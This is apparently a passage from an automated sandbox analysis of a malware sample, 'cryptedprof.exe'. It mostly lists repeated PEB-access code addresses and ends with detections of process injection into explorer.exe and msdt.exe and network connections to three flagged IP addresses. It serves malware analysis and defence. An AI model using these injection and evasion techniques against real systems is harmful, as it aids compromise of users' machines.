          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA309 mov eax, dword ptr fs:[00000030h]3_2_00ADA309
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA309 mov eax, dword ptr fs:[00000030h]3_2_00ADA309
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA309 mov eax, dword ptr fs:[00000030h]3_2_00ADA309
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA309 mov eax, dword ptr fs:[00000030h]3_2_00ADA309
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA309 mov eax, dword ptr fs:[00000030h]3_2_00ADA309
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA309 mov eax, dword ptr fs:[00000030h]3_2_00ADA309
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA309 mov eax, dword ptr fs:[00000030h]3_2_00ADA309
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA309 mov eax, dword ptr fs:[00000030h]3_2_00ADA309
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA309 mov eax, dword ptr fs:[00000030h]3_2_00ADA309
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA309 mov eax, dword ptr fs:[00000030h]3_2_00ADA309
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA309 mov eax, dword ptr fs:[00000030h]3_2_00ADA309
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA309 mov eax, dword ptr fs:[00000030h]3_2_00ADA309
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA309 mov eax, dword ptr fs:[00000030h]3_2_00ADA309
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B7131B mov eax, dword ptr fs:[00000030h]3_2_00B7131B
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ABDB60 mov ecx, dword ptr fs:[00000030h]3_2_00ABDB60
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE3B7A mov eax, dword ptr fs:[00000030h]3_2_00AE3B7A
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE3B7A mov eax, dword ptr fs:[00000030h]3_2_00AE3B7A
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B88B58 mov eax, dword ptr fs:[00000030h]3_2_00B88B58
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ABDB40 mov eax, dword ptr fs:[00000030h]3_2_00ABDB40
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ABF358 mov eax, dword ptr fs:[00000030h]3_2_00ABF358
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B74496 mov eax, dword ptr fs:[00000030h]3_2_00B74496
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B74496 mov eax, dword ptr fs:[00000030h]3_2_00B74496
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B74496 mov eax, dword ptr fs:[00000030h]3_2_00B74496
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B74496 mov eax, dword ptr fs:[00000030h]3_2_00B74496
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B74496 mov eax, dword ptr fs:[00000030h]3_2_00B74496
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B74496 mov eax, dword ptr fs:[00000030h]3_2_00B74496
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B74496 mov eax, dword ptr fs:[00000030h]3_2_00B74496
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B74496 mov eax, dword ptr fs:[00000030h]3_2_00B74496
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B74496 mov eax, dword ptr fs:[00000030h]3_2_00B74496
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B74496 mov eax, dword ptr fs:[00000030h]3_2_00B74496
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B74496 mov eax, dword ptr fs:[00000030h]3_2_00B74496
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B74496 mov eax, dword ptr fs:[00000030h]3_2_00B74496
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B74496 mov eax, dword ptr fs:[00000030h]3_2_00B74496
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC849B mov eax, dword ptr fs:[00000030h]3_2_00AC849B
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B36CF0 mov eax, dword ptr fs:[00000030h]3_2_00B36CF0
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B36CF0 mov eax, dword ptr fs:[00000030h]3_2_00B36CF0
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B36CF0 mov eax, dword ptr fs:[00000030h]3_2_00B36CF0
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B714FB mov eax, dword ptr fs:[00000030h]3_2_00B714FB
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B88CD6 mov eax, dword ptr fs:[00000030h]3_2_00B88CD6
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEBC2C mov eax, dword ptr fs:[00000030h]3_2_00AEBC2C
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]3_2_00B71C06
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]3_2_00B71C06
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]3_2_00B71C06
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]3_2_00B71C06
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]3_2_00B71C06
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]3_2_00B71C06
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]3_2_00B71C06
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]3_2_00B71C06
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]3_2_00B71C06
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]3_2_00B71C06
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]3_2_00B71C06
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]3_2_00B71C06
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]3_2_00B71C06
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]3_2_00B71C06
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B8740D mov eax, dword ptr fs:[00000030h]3_2_00B8740D
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B8740D mov eax, dword ptr fs:[00000030h]3_2_00B8740D
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B8740D mov eax, dword ptr fs:[00000030h]3_2_00B8740D
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B36C0A mov eax, dword ptr fs:[00000030h]3_2_00B36C0A
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B36C0A mov eax, dword ptr fs:[00000030h]3_2_00B36C0A
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B36C0A mov eax, dword ptr fs:[00000030h]3_2_00B36C0A
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B36C0A mov eax, dword ptr fs:[00000030h]3_2_00B36C0A
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AD746D mov eax, dword ptr fs:[00000030h]3_2_00AD746D
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEAC7B mov eax, dword ptr fs:[00000030h]3_2_00AEAC7B
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEAC7B mov eax, dword ptr fs:[00000030h]3_2_00AEAC7B
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEAC7B mov eax, dword ptr fs:[00000030h]3_2_00AEAC7B
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEAC7B mov eax, dword ptr fs:[00000030h]3_2_00AEAC7B
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEAC7B mov eax, dword ptr fs:[00000030h]3_2_00AEAC7B
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEAC7B mov eax, dword ptr fs:[00000030h]3_2_00AEAC7B
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEAC7B mov eax, dword ptr fs:[00000030h]3_2_00AEAC7B
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEAC7B mov eax, dword ptr fs:[00000030h]3_2_00AEAC7B
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEAC7B mov eax, dword ptr fs:[00000030h]3_2_00AEAC7B
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEAC7B mov eax, dword ptr fs:[00000030h]3_2_00AEAC7B
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEAC7B mov eax, dword ptr fs:[00000030h]3_2_00AEAC7B
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B4C450 mov eax, dword ptr fs:[00000030h]3_2_00B4C450
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B4C450 mov eax, dword ptr fs:[00000030h]3_2_00B4C450
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEA44B mov eax, dword ptr fs:[00000030h]3_2_00AEA44B
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE35A1 mov eax, dword ptr fs:[00000030h]3_2_00AE35A1
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B805AC mov eax, dword ptr fs:[00000030h]3_2_00B805AC
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B805AC mov eax, dword ptr fs:[00000030h]3_2_00B805AC
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE1DB5 mov eax, dword ptr fs:[00000030h]3_2_00AE1DB5
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE1DB5 mov eax, dword ptr fs:[00000030h]3_2_00AE1DB5
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE1DB5 mov eax, dword ptr fs:[00000030h]3_2_00AE1DB5
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AB2D8A mov eax, dword ptr fs:[00000030h]3_2_00AB2D8A
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AB2D8A mov eax, dword ptr fs:[00000030h]3_2_00AB2D8A
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AB2D8A mov eax, dword ptr fs:[00000030h]3_2_00AB2D8A
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AB2D8A mov eax, dword ptr fs:[00000030h]3_2_00AB2D8A
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AB2D8A mov eax, dword ptr fs:[00000030h]3_2_00AB2D8A
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE2581 mov eax, dword ptr fs:[00000030h]3_2_00AE2581
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE2581 mov eax, dword ptr fs:[00000030h]3_2_00AE2581
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE2581 mov eax, dword ptr fs:[00000030h]3_2_00AE2581
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE2581 mov eax, dword ptr fs:[00000030h]3_2_00AE2581
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEFD9B mov eax, dword ptr fs:[00000030h]3_2_00AEFD9B
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEFD9B mov eax, dword ptr fs:[00000030h]3_2_00AEFD9B
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B68DF1 mov eax, dword ptr fs:[00000030h]3_2_00B68DF1
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ACD5E0 mov eax, dword ptr fs:[00000030h]3_2_00ACD5E0
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ACD5E0 mov eax, dword ptr fs:[00000030h]3_2_00ACD5E0
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B7FDE2 mov eax, dword ptr fs:[00000030h]3_2_00B7FDE2
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B7FDE2 mov eax, dword ptr fs:[00000030h]3_2_00B7FDE2
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B7FDE2 mov eax, dword ptr fs:[00000030h]3_2_00B7FDE2
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B7FDE2 mov eax, dword ptr fs:[00000030h]3_2_00B7FDE2
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B36DC9 mov eax, dword ptr fs:[00000030h]3_2_00B36DC9
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B36DC9 mov eax, dword ptr fs:[00000030h]3_2_00B36DC9
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B36DC9 mov eax, dword ptr fs:[00000030h]3_2_00B36DC9
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B36DC9 mov ecx, dword ptr fs:[00000030h]3_2_00B36DC9
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B36DC9 mov eax, dword ptr fs:[00000030h]3_2_00B36DC9
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B36DC9 mov eax, dword ptr fs:[00000030h]3_2_00B36DC9
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B3A537 mov eax, dword ptr fs:[00000030h]3_2_00B3A537
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B88D34 mov eax, dword ptr fs:[00000030h]3_2_00B88D34
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B7E539 mov eax, dword ptr fs:[00000030h]3_2_00B7E539
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE4D3B mov eax, dword ptr fs:[00000030h]3_2_00AE4D3B
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE4D3B mov eax, dword ptr fs:[00000030h]3_2_00AE4D3B
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE4D3B mov eax, dword ptr fs:[00000030h]3_2_00AE4D3B
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]3_2_00AC3D34
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]3_2_00AC3D34
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]3_2_00AC3D34
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]3_2_00AC3D34
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]3_2_00AC3D34
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]3_2_00AC3D34
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]3_2_00AC3D34
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]3_2_00AC3D34
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]3_2_00AC3D34
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]3_2_00AC3D34
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]3_2_00AC3D34
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]3_2_00AC3D34
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]3_2_00AC3D34
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ABAD30 mov eax, dword ptr fs:[00000030h]3_2_00ABAD30
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADC577 mov eax, dword ptr fs:[00000030h]3_2_00ADC577
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADC577 mov eax, dword ptr fs:[00000030h]3_2_00ADC577
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF3D43 mov eax, dword ptr fs:[00000030h]3_2_00AF3D43
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B33540 mov eax, dword ptr fs:[00000030h]3_2_00B33540
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B63D40 mov eax, dword ptr fs:[00000030h]3_2_00B63D40
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AD7D50 mov eax, dword ptr fs:[00000030h]3_2_00AD7D50
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B346A7 mov eax, dword ptr fs:[00000030h]3_2_00B346A7
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B80EA5 mov eax, dword ptr fs:[00000030h]3_2_00B80EA5
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B80EA5 mov eax, dword ptr fs:[00000030h]3_2_00B80EA5
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B80EA5 mov eax, dword ptr fs:[00000030h]3_2_00B80EA5
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B4FE87 mov eax, dword ptr fs:[00000030h]3_2_00B4FE87
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE16E0 mov ecx, dword ptr fs:[00000030h]3_2_00AE16E0
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC76E2 mov eax, dword ptr fs:[00000030h]3_2_00AC76E2
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE36CC mov eax, dword ptr fs:[00000030h]3_2_00AE36CC
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF8EC7 mov eax, dword ptr fs:[00000030h]3_2_00AF8EC7
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B88ED6 mov eax, dword ptr fs:[00000030h]3_2_00B88ED6
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B6FEC0 mov eax, dword ptr fs:[00000030h]3_2_00B6FEC0
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B6FE3F mov eax, dword ptr fs:[00000030h]3_2_00B6FE3F
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ABE620 mov eax, dword ptr fs:[00000030h]3_2_00ABE620
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ABC600 mov eax, dword ptr fs:[00000030h]3_2_00ABC600
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ABC600 mov eax, dword ptr fs:[00000030h]3_2_00ABC600
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ABC600 mov eax, dword ptr fs:[00000030h]3_2_00ABC600
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE8E00 mov eax, dword ptr fs:[00000030h]3_2_00AE8E00
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEA61C mov eax, dword ptr fs:[00000030h]3_2_00AEA61C
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEA61C mov eax, dword ptr fs:[00000030h]3_2_00AEA61C
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B71608 mov eax, dword ptr fs:[00000030h]3_2_00B71608
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC766D mov eax, dword ptr fs:[00000030h]3_2_00AC766D
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADAE73 mov eax, dword ptr fs:[00000030h]3_2_00ADAE73
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADAE73 mov eax, dword ptr fs:[00000030h]3_2_00ADAE73
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADAE73 mov eax, dword ptr fs:[00000030h]3_2_00ADAE73
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADAE73 mov eax, dword ptr fs:[00000030h]3_2_00ADAE73
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADAE73 mov eax, dword ptr fs:[00000030h]3_2_00ADAE73
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC7E41 mov eax, dword ptr fs:[00000030h]3_2_00AC7E41
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC7E41 mov eax, dword ptr fs:[00000030h]3_2_00AC7E41
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC7E41 mov eax, dword ptr fs:[00000030h]3_2_00AC7E41
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC7E41 mov eax, dword ptr fs:[00000030h]3_2_00AC7E41
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC7E41 mov eax, dword ptr fs:[00000030h]3_2_00AC7E41
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC7E41 mov eax, dword ptr fs:[00000030h]3_2_00AC7E41
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B7AE44 mov eax, dword ptr fs:[00000030h]3_2_00B7AE44
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B7AE44 mov eax, dword ptr fs:[00000030h]3_2_00B7AE44
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B37794 mov eax, dword ptr fs:[00000030h]3_2_00B37794
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B37794 mov eax, dword ptr fs:[00000030h]3_2_00B37794
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B37794 mov eax, dword ptr fs:[00000030h]3_2_00B37794
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04761074 mov eax, dword ptr fs:[00000030h]7_2_04761074
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04752073 mov eax, dword ptr fs:[00000030h]7_2_04752073
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046B746D mov eax, dword ptr fs:[00000030h]7_2_046B746D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0472C450 mov eax, dword ptr fs:[00000030h]7_2_0472C450
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0472C450 mov eax, dword ptr fs:[00000030h]7_2_0472C450
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046CA44B mov eax, dword ptr fs:[00000030h]7_2_046CA44B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046B0050 mov eax, dword ptr fs:[00000030h]7_2_046B0050
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046B0050 mov eax, dword ptr fs:[00000030h]7_2_046B0050
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046AB02A mov eax, dword ptr fs:[00000030h]7_2_046AB02A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046AB02A mov eax, dword ptr fs:[00000030h]7_2_046AB02A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046AB02A mov eax, dword ptr fs:[00000030h]7_2_046AB02A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046AB02A mov eax, dword ptr fs:[00000030h]7_2_046AB02A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046CBC2C mov eax, dword ptr fs:[00000030h]7_2_046CBC2C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046C002D mov eax, dword ptr fs:[00000030h]7_2_046C002D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046C002D mov eax, dword ptr fs:[00000030h]7_2_046C002D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046C002D mov eax, dword ptr fs:[00000030h]7_2_046C002D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046C002D mov eax, dword ptr fs:[00000030h]7_2_046C002D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046C002D mov eax, dword ptr fs:[00000030h]7_2_046C002D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04764015 mov eax, dword ptr fs:[00000030h]7_2_04764015
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04764015 mov eax, dword ptr fs:[00000030h]7_2_04764015
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04717016 mov eax, dword ptr fs:[00000030h]7_2_04717016
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04717016 mov eax, dword ptr fs:[00000030h]7_2_04717016
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04717016 mov eax, dword ptr fs:[00000030h]7_2_04717016
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04751C06 mov eax, dword ptr fs:[00000030h]7_2_04751C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04751C06 mov eax, dword ptr fs:[00000030h]7_2_04751C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04751C06 mov eax, dword ptr fs:[00000030h]7_2_04751C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04751C06 mov eax, dword ptr fs:[00000030h]7_2_04751C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04751C06 mov eax, dword ptr fs:[00000030h]7_2_04751C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04751C06 mov eax, dword ptr fs:[00000030h]7_2_04751C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04751C06 mov eax, dword ptr fs:[00000030h]7_2_04751C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04751C06 mov eax, dword ptr fs:[00000030h]7_2_04751C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04751C06 mov eax, dword ptr fs:[00000030h]7_2_04751C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04751C06 mov eax, dword ptr fs:[00000030h]7_2_04751C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04751C06 mov eax, dword ptr fs:[00000030h]7_2_04751C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04751C06 mov eax, dword ptr fs:[00000030h]7_2_04751C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04751C06 mov eax, dword ptr fs:[00000030h]7_2_04751C06
          Source: C:\Users\user\Desktop\cryptedprof.exe Process token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exe Network Connect: 111.221.46.49 80
          Source: C:\Windows\explorer.exe Network Connect: 168.206.81.138 80
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\cryptedprof.exe Section loaded: unknown target: C:\Users\user\Desktop\cryptedprof.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\cryptedprof.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\cryptedprof.exe Section loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\msdt.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\msdt.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\cryptedprof.exe Thread register set: target process: 3440
          Source: C:\Windows\SysWOW64\msdt.exe Thread register set: target process: 3440
